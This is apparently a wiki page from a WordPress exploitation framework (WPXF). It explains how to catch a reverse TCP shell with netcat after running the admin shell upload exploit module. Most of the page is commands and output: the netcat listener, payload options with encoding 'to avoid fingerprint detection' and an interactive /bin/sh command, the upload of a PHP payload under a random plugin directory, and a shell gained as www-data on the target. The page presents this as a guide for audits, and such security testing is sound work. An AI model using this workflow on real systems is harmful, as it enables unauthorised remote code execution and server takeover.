-
-
Notifications
You must be signed in to change notification settings - Fork 265
Using a Third Party TCP Server with Reverse TCP Payload
The reverse_tcp payload, by default, will launch a TCP server to accept incoming connections. There may be scenarios in which you need to use a third party package to listen for the connection being made from the target machine, such as if the target machine needs to connect to a machine other than the one you are running WPXF on.
How you choose to do this when doing an actual audit will vary based on your requirements, however, for example's sake, we'll use netcat to listen on port 1234 by running the following command on a host which has netcat installed:
netcat -l -n -v 1234
If you're using Windows, a good alternative to netcat is ncat, available here: https://nmap.org/ncat/
Once the TCP server is listening for incoming connections, load WPXF and load an exploit module. In this example, we'll just be using the generic admin shell upload (exploit/shell/admin_shell_upload).
Once the module is loaded, set the payload to reverse_tcp and take a look at the available options using show options. You'll see that there is an option named listen_with_wpxf in the list:
Name Current Setting Required Description
---------------- --------------------------- -------- --------------------------------------------
listen_with_wpxf true true Listen for an incoming connection using WPXF
By setting this option to false, WPXF will no longer start up its own TCP server when the exploit is being executed. In addition to setting this to false, we'll also need to set the lhost option to point to the host that netcat is running on.
After setting these options, your payload options should look similar to the below:
Name Current Setting Required Description
---------------- --------------------------- -------- -------------------------------------------------------------------------
encode_payload true true Encode the payload to avoid fingerprint detection
shell uname -a; w; id; /bin/sh -i true Shell command to run
lhost 192.168.1.16 true The address of the host listening for a connection
lport 1234 true The port being used to listen for incoming connections
chunk_size 1400 true TCP chunk size
listen_with_wpxf false true Listen for an incoming connection using WPXF
bind_to_address 0.0.0.0 true The address to bind to when using WPXF to listen for incoming connections
Set the other module options and start the exploit by using run and you should see the session established on the host running the TCP server that we started earlier with netcat:
Host running WPXF:
[-] Authenticating with WordPress using root:toor...
[-] Uploading payload...
[-] Executing the payload at
http://192.168.1.15/wordpress/wp-content/plugins/xqbBGFpVuL/pTbgOnSeqi.php...
[+] Execution finished successfully
Host running netcat:
Listening on [0.0.0.0] (family 0, port 1234)
Connection from [192.168.1.15] port 1234 [tcp/*] accepted (family 2, sport 37692)
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
21:15:25 up 1 min, 0 users, load average: 0.40, 0.21, 0.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$